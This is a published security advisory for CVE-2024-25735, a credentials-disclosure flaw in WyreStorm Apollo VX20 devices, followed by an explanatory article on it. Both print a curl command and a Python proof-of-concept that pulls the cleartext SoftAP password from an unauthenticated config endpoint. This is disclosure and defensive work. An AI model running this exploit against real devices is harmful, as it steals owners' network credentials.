Wyrestorm Apollo VX20 < 1.3.58 - Incorrect Access Control 'Credentials Disclosure'
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/WYRESTORM_APOLLO_VX20_INCORRECT_ACCESS_CONTROL_CREDENTIALS_DISCLOSURE_CVE-2024-25735.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec
[Vendor]
www.wyrestorm.com
[Product]
APOLLO VX20 < 1.3.58
[Vulnerability Type]
Incorrect Access Control (Credentials Disclosure)
[Affected Component]
Web interface, config
[Affected Product Code Base]
APOLLO VX20 < 1.3.58, fixed in v1.3.58
[CVE Reference]
CVE-2024-25735
[Security Issue]
An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58.
Remote attackers can discover cleartext credentials for the SoftAP (access point) Router /device/config using an HTTP GET request.
The credentials are then returned in the HTTP response. curl -k https://192.168.x.x/device/config
E.g. HTTP response snippet:
:{"enable":"y","oncmd":"8004","offcmd":"8036"}},"screen":"dual","ipconflict":"y","wifi":{"auto":"y","band":"5","channel":"153"}
,"softAp":{"password":"12345678","router":"y","softAp":"y"}...
[Exploit/POC]
import requests
target="https://x.x.x.x"
res = requests.get(target+"/device/config", verify=False)
idx=res.content.find('{"password":')
if idx != -1:
idx2=res.content.find('router')
if idx2 != -1:
print("[+] CVE-2024-25735 Credentials Disclosure")
print("[+] " + res.content[idx + 1:idx2 + 11])
print("[+] hyp3rlinx")
else:
print("[!] Apollo vX20 Device not vulnerable...")
[Network Access]
Remote
[Severity]
High
[Disclosure Timeline]
Vendor Notification: January 18, 2024
Vendor released fixed firmware v1.3.58: February 2, 2024
February 11, 2024 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinxCVE-2024-25735: WyreStorm Apollo VX20 < 1.3.58 – Incorrect Access Control & Credentials Disclosure
Security researchers have uncovered a critical vulnerability in the WyreStorm Apollo VX20 device series, affecting firmware versions prior to 1.3.58. This flaw, identified as CVE-2024-25735, exposes cleartext credentials via an unauthenticated HTTP GET request to the device's configuration endpoint. The issue stems from a fundamental failure in access control, allowing remote attackers to retrieve sensitive data without proper authorization.
Technical Overview of the Vulnerability
The vulnerability lies in the web interface's device/config endpoint, which is accessible over HTTPS without authentication. When an attacker sends a simple HTTP GET request to this endpoint, the device returns a JSON response containing configuration details—including the SoftAP password in plain text.
curl -k https://192.168.x.x/device/config
Example response snippet:
{"softAp":{"password":"12345678","router":"y","softAp":"y"}}
Here, the password field is exposed in cleartext, meaning no encryption or obfuscation is applied. This is a severe breach of security best practices, especially in devices meant for secure, private network environments.
Exploitation and Proof of Concept
Security researcher John Page (aka hyp3rlinx) demonstrated the exploit using a simple Python script. This script automates the detection of vulnerable devices and extracts credentials.
import requests
target = "https://x.x.x.x"
res = requests.get(target + "/device/config", verify=False)
idx = res.content.find('{"password":')
if idx != -1:
idx2 = res.content.find('router')
if idx2 != -1:
print("[+] CVE-2024-25735 Credentials Disclosure")
print("[+] " + res.content[idx + 1:idx2 + 11])
print("[+] hyp3rlinx")
else:
print("[!] Apollo VX20 Device not vulnerable...")
Explanation: This script sends a GET request to the /device/config endpoint with verify=False to bypass SSL certificate validation (common in testing environments). It then searches for the string {"password": in the response body. If found, it extracts the password value by identifying the next occurrence of router as a delimiter. The output reveals the cleartext password, confirming the vulnerability.
Why This Is a High-Severity Issue
| Factor | Impact |
|---|---|
| Remote Access | Attackers can exploit from anywhere on the network, even without being physically near the device. |
| Authentication Bypass | No login or session required—credentials are exposed in plain text. |
| Cleartext Credentials | Full password is readable, enabling immediate compromise of the SoftAP network. |
| Network Exposure | Devices like Apollo VX20 are often used in home or office networks, making credentials highly valuable. |
Even if the device is behind a firewall, attackers with access to the local network (e.g., via rogue Wi-Fi or a compromised IoT device) can leverage this flaw to gain control over the SoftAP, potentially leading to man-in-the-middle attacks, credential theft, or full network takeover.
Vendor Response and Timeline
The vulnerability was reported to WyreStorm on January 18, 2024. The vendor released a fixed firmware update v1.3.58 on February 2, 2024, addressing the access control flaw. Public disclosure occurred on February 11, 2024, ensuring transparency and enabling users to patch their devices.
Recommendations for Users and Organizations
- Update Firmware Immediately: All Apollo VX20 devices running firmware before 1.3.58 should be updated to the latest version.
- Disable Remote Access: If the device is not intended to be accessible from external networks, disable or restrict access to the web interface via firewall rules.
- Monitor for Unauthorized Access: Use network monitoring tools to detect unexpected HTTP GET requests to
/device/config. - Use Strong Passwords: Even if the vulnerability is patched, ensure that SoftAP passwords are complex and unique.
- Regular Security Audits: Conduct routine checks on all IoT devices for exposed configuration endpoints.
Expert Insight: Lessons from CVE-2024-25735
This vulnerability serves as a stark reminder that access control is not optional—even in internal or local network devices. Many manufacturers assume that "internal" devices are inherently safe, but this is a dangerous misconception. The absence of authentication on a configuration endpoint is a red flag for security professionals.
As IoT devices proliferate, the attack surface expands. The Apollo VX20 case highlights how a single oversight—exposing configuration data in plain text—can enable full compromise. This is not just a technical flaw; it's a design flaw rooted in poor security hygiene.
For developers and vendors: always assume external access and apply authentication, encryption, and rate-limiting to sensitive endpoints. Use JSON Web Tokens (JWT) or session-based authentication for configuration access. Never expose credentials in response bodies unless they are properly encrypted or masked.
Conclusion
CVE-2024-25735 is a prime example of how incorrect access control can lead to catastrophic credential disclosure. The WyreStorm Apollo VX20 vulnerability, though resolved, underscores the importance of proactive security measures in embedded systems. Users must remain vigilant, update firmware regularly, and adopt zero-trust principles—even for seemingly "safe" devices.
Disclaimer: The information in this advisory is provided "as-is" with no warranties. Redistribution is permitted with proper credit to the author, hyp3rlinx. Unauthorized or malicious use of this information is prohibited.